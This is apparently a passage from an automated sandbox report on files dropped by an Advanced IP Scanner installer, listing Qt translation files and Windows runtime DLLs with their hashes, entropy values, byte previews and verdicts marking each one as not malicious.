SHA-512:	59A873E28746DA37458C3C37EC8B7E7F303E57FA6EADC3A2DCAB8456DCA625EA4A96D05B83DA434A92FE3CFB37578564B0279A9E27E85D6E8ED3EF4E7E4021E9
Malicious:	false
Preview:	<.d....!..`...B..........V....;.......;...w...;...S...;.. ....;..A....O..Y\...[..UD...^...G...^..QP..(5......G.......H,..N...K...=...N:......V...Ck.._...Z.......'.......N....y..O................j......Vr...t..)G...t..O....t..Y......>....j...!..5t...)..@...@...H5..W/..f....m......D2.......c.......S...~..1&...`..5....e..X.......X........,. =...E=..y...P..y...-..%..#...0..#..+.......+.......+......+......+....%_.G.....5.G....)..H0...X..Hw9...C.Hw9...[.I....'d.J6......J6....D.J6......J6...G..LD......L.b..Y4.M.S..?H.R.....<.V.......Wi...X..W.T.....Z.\|..PK.[f3..S..gc....v.w0K..FZ..H...$u......Z....T......."..2....~..52.. d..D....T..,...2...........W.......]..9.E..>Z.L.#..`e.M$o.....e.......l8...4....^..G...I....D......@.......Q.......WS..>......>...~..3..-...l...IR......7..5.l..\..AV...'!.y....U....0..Q.......P.......V...tb..3................c......R#......;z......M8.(....Q\|.1V...(<.R....0%.W.<..]m.f.~.. .......2...1........^..4....5..........\|...c..D..;6..._..q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_uk_ua.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28836
Entropy (8bit):	5.274937745581086
Encrypted:	false
SSDEEP:	768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
MD5:	EE64BC556D9E554E5122531BBA368240
SHA1:	C691C2D832157EF9FD50F0D2C5B91EA9B6934979
SHA-256:	11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
SHA-512:	23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
Malicious:	false
Preview:	<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I...y......y......%..&...0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.\|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V.....R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_vi_vn.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27204
Entropy (8bit):	5.005345988323232
Encrypted:	false
SSDEEP:	384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
MD5:	53839022420E21292B81995749C5BCBD
SHA1:	D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
SHA-256:	44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
SHA-512:	6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
Malicious:	false
Preview:	<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D...y......y......%..$X..0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.\|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_cn.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21282
Entropy (8bit):	5.593895866111406
Encrypted:	false
SSDEEP:	384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
MD5:	6885AC8F42A02A32B59AA84D330925C3
SHA1:	A070B4B8BF1128197681487D332168A537107FB9
SHA-256:	2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
SHA-512:	4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
Malicious:	false
Preview:	<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...\|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3...y......y......%......0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.\|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_tw.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21326
Entropy (8bit):	5.601982778539758
Encrypted:	false
SSDEEP:	384:4DlwToFrc4xM4iwF3sE5nARVIAgNv95UWr/LGLKbTR1Zo:4DlwTsc4O4i8sE5ncWjz5UWr/y/
MD5:	B961B562628E357221F12EB6A212860C
SHA1:	35E6905D0410CEDC12B77EA8735CEDCB74913B25
SHA-256:	5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
SHA-512:	8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
Malicious:	false
Preview:	<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3...y......y......%...F..0...q.+.......+......+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.\|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&........5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.960788331628294
Encrypted:	false
SSDEEP:	192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
MD5:	37DA7F6961082DD96A537235DD89B114
SHA1:	DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
SHA-256:	6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
SHA-512:	AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.97464085764015
Encrypted:	false
SSDEEP:	192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
MD5:	3B3BD0AD4FEA16AB58FCAEAE4629879C
SHA1:	EB175F53640FB8AC4028A7657BBF48823A535677
SHA-256:	DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
SHA-512:	F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.982441576564087
Encrypted:	false
SSDEEP:	384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
MD5:	584766DF684B2AD2A3A5B05A5B457FAC
SHA1:	C207B7AEDB8D978C8320A1454331519A8365F20D
SHA-256:	B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
SHA-512:	3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.00674396465633
Encrypted:	false
SSDEEP:	192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
MD5:	906CB0C8ABA8342D552B0F37DDFD475F
SHA1:	A3CD528B9C212FEA97495A557A91D638B1608418
SHA-256:	582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
SHA-512:	27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22208
Entropy (8bit):	6.906399541614446
Encrypted:	false
SSDEEP:	192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
MD5:	779A8B14C22E463EA535CBCA9EA84D49
SHA1:	4620531D5291878C10D6E3974F240B98BC7FB4B9
SHA-256:	FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
SHA-512:	08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.98650705248822
Encrypted:	false
SSDEEP:	192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
MD5:	F6D1216E974FB76585FD350EBDC30648
SHA1:	F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
SHA-256:	348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
SHA-512:	756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......W5....@.............................L............ ...................<..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.046229749504995
Encrypted:	false
SSDEEP:	192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
MD5:	BFB08FB09E8D68673F2F0213C59E2B97
SHA1:	E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
SHA-256:	6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
SHA-512:	E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.993015464813673
Encrypted:	false
SSDEEP:	192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
MD5:	FC68978ABB44E572DFE637B7DD3D615F
SHA1:	47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
SHA-256:	DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
SHA-512:	7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.95985126360952
Encrypted:	false
SSDEEP:	384:8l6W2hWJ7QA0GftpBj8VbJOAlXBtFwA+S:p+yi2VbJy4
MD5:	1CD8672D8C08B39560A9D5518836493E
SHA1:	C7CE2330265D07D88AD15F80DD88473F3DAAFCD0
SHA-256:	4A5F33A0837A9D9F22D49EE6D062BAE671A4C5C5522DB6FFE03C1AA2C0BD008E
SHA-512:	6BCE6EF09746C10E3B3F136BB2CE67002F27FF70C3FCBA48E7F1C3769000A62649A41FD82ACBE2A819B8ECE96D8E9399B15104CA2B40F65B51A0C84FC2A7901C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.9718846004654225
Encrypted:	false
SSDEEP:	384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
MD5:	B8BB783DEE4EA95576882625C365E616
SHA1:	E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
SHA-256:	21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
SHA-512:	B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.018574692016083
Encrypted:	false
SSDEEP:	384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
MD5:	44CA070DC5C09FF8588CF6CDCB64E7A2
SHA1:	63D1DA68CD984532217BEACC21B868B46EC5D910
SHA-256:	EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
SHA-512:	C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.98505637818331
Encrypted:	false
SSDEEP:	384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
MD5:	3B9D034CA8A0345BC8F248927A86BF22
SHA1:	95FAF5007DAF8BA712A5D17F865F0E7938DA662B
SHA-256:	A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
SHA-512:	04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.986049300390525
Encrypted:	false
SSDEEP:	192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
MD5:	FC13F11A2458879B23C87B29C2BAD934
SHA1:	68B15CC21F5541DC2226E9E967E08AF81D04A537
SHA-256:	624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
SHA-512:	801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...\|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.04628745407397
Encrypted:	false
SSDEEP:	192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
MD5:	07954AF744363F9807355E4E9408DF45
SHA1:	B37D06B39EB7186B55CEAE25427B7AB95E46E32F
SHA-256:	4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
SHA-512:	B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961454559139268
Encrypted:	false
SSDEEP:	192:GkZjWVghW/WgbXH9YOCAs/nGfe4pBjSfr4i6wWNArXVWQ4mWQVUqnajMHxxBNT0u:fjW2hWegbCA0GftpBjc4aolI663Ub2
MD5:	39556E904FA2405ABAF27231DA8EF9E5
SHA1:	89DB01B04DFDBE5C0F5E856050611A6A72F1AFD0
SHA-256:	5F476627A904B182D9B3F142594DEFA267DB3CE8206BAC24AF063A29635B3A8B
SHA-512:	558C0D0DD0CE24C7DCDEBAE64578E09ACC36A86B6F121266A147394DD9E8F8B2B81726B9CCC24ED07755950CD13C1D34CAB137E995D0BE25EBF52699D0FBB6B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......B.....@......................... ...G............ ...................<..............8............................................................................text...g........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
